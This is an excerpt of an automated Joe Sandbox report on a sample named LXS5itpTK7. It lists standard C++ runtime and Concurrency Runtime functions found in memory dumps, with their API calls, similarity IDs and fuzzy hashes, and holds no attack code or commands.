Instruction Fuzzy Hash: FE015E71990308EFDB15EFA4C484BDDB7B3BF18729F50802AD055AB280DBB59544CF95

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0214C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0214C1A4

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 5b8446454a334bc85cedb450d67c76b121b83e506d2abbd6aa24ab740ede00f3
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1001A47A486149EBDF169FD4DD018AD3BA6AB25650F488412F92C84060DB32C6B0EAC1

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 02143773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0214378C

Part of subcall function 02142B16: ___crtGetTimeFormatEx.LIBCMT ref: 02142B2C
Part of subcall function 02142B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02142B4B

GetLastError.KERNEL32 ref: 021437A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021437BE
__CxxThrowException@8.LIBVCRUNTIME ref: 021437CC

Part of subcall function 021428EC: SetThreadPriority.KERNEL32(?,?), ref: 021428F8

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: de984535de8cab79ebb1d58ec5fe84152ae800269374717559d6cd6cdb02598b
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 5CF027B2A802153ED720B7714C06FBB369C9F00751F600866BD58E2080EFA8D4408AB4

Function 0213D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02141342

Part of subcall function 02140BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02140BD6
Part of subcall function 02140BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02140BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02141355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02141361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0214136A

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 1d203577a46b071e149d888273c3303740e286a85a308a295e391e358be79349
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 14F0B4316C4704BF9F187E75081057E31A76F55328B084179962D9F780DF719D459A98

Function 0214D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0214D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0214D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0214D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0214D0CD

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: f50d712a2d29b870bae1ae17e5eb88c359a99b97f7cbbdf49346edbe105d40d8
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 9FF05931A80204ABCB24FA54F840C5EB37A9F90B1836086AAD81D13281DF32B90ACA52

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 02135A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02135A83
__Cnd_signal.LIBCPMT ref: 02135A8F
std::_Cnd_initX.LIBCPMT ref: 02135AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02135AAB

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: df654723ea11a396fa448aa03c1d8ce8be1e09b94bd517f524969a3fa50a2413
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 2DF0A072480700AFEB237B71E80575A73A3AF00728F144829E0899A8A0CF7AE8159E55

Function 02142858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0214286F
GetLastError.KERNEL32(?,?,?,?,02148830,?,?,?,?,00000000,?,00000000), ref: 0214287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142894
__CxxThrowException@8.LIBVCRUNTIME ref: 021428A2

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: ff2bbfbd81889a6b15fa1ecc4e0df77b1f56697af57f07c450a133cd1701466f
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 06F0A03464010ABBCF00EFA4CD44EAF37B8AB00701F200661B914E20A0DB35D6549B64

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 0214257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02142593
GetLastError.KERNEL32(?,?,?,?,?,02140DA0), ref: 021425A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021425B7
__CxxThrowException@8.LIBVCRUNTIME ref: 021425C5

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 18832acccb573702011dcd4e980d354185d202bfff90719e89431540b296d397
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: C9E0D8616803152DE710B7744C12FBB369C9B00B41F540861BD18E51C1FFA8D14049A4

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02149530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142959: TlsAlloc.KERNEL32(?,02140DA0), ref: 0214295F

TlsAlloc.KERNEL32(?,02140DA0), ref: 02153BE6
GetLastError.KERNEL32 ref: 02153BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02153C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02153C1C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 3409bf848e26d4f2f1d944064fc1d2e250f1aaf9a3aafc8432051a8731b0d2e7
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 5AE02234480225EFC310BB759C49A7E7268AB003817100AA6E839E31A0EF35E0858E6C

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 02142794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02140DA0), ref: 0214279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02140DA0), ref: 021427AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021427C3
__CxxThrowException@8.LIBVCRUNTIME ref: 021427D1

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 478b9a21349ccf36c5067ca93a6f61d9272f76d7ac7f8374516262c04662c232
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: C0E0867464010AABCB00FBB5DD49EAF77BC6B00B06B600565B915E3150EF78D7488B79

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 021428EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 021428F8
GetLastError.KERNEL32 ref: 02142904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0214291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02142928

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 8bf10fad65b2f1a8954fb2aff6bdc0dc732e5be3a2c8b66e351a6b8d80afc0d3
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 16E08634540119ABDB14BF71CC05BBB376CAB00745B500925BC19D20A1EF39D1548A98

Function 021429B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02147BD8,00000000,?,?,02140DA0,?,?,?,00000000,?,00000000), ref: 021429BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021429CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021429E0
__CxxThrowException@8.LIBVCRUNTIME ref: 021429EE

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 8fc8dd68886b662c20f542d6e3d2e78692afaea236afdd769672a8cc6df12ac7
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: C1E08634140119ABDB10BF71CC08BBF376CAF00745B500925BD1DE20A0EF39D1549AA8

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 02142959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02140DA0), ref: 0214295F
GetLastError.KERNEL32 ref: 0214296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142982
__CxxThrowException@8.LIBVCRUNTIME ref: 02142990

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 92bc6ae4f9fa6def83eb15d684b526e64a2f23e489f831f3dde791c7ad6e2614
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 9DE0C230040125AB8714BBB89C48A7B72A86B01715B600B26F869E20E0EF78D0488AA8

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

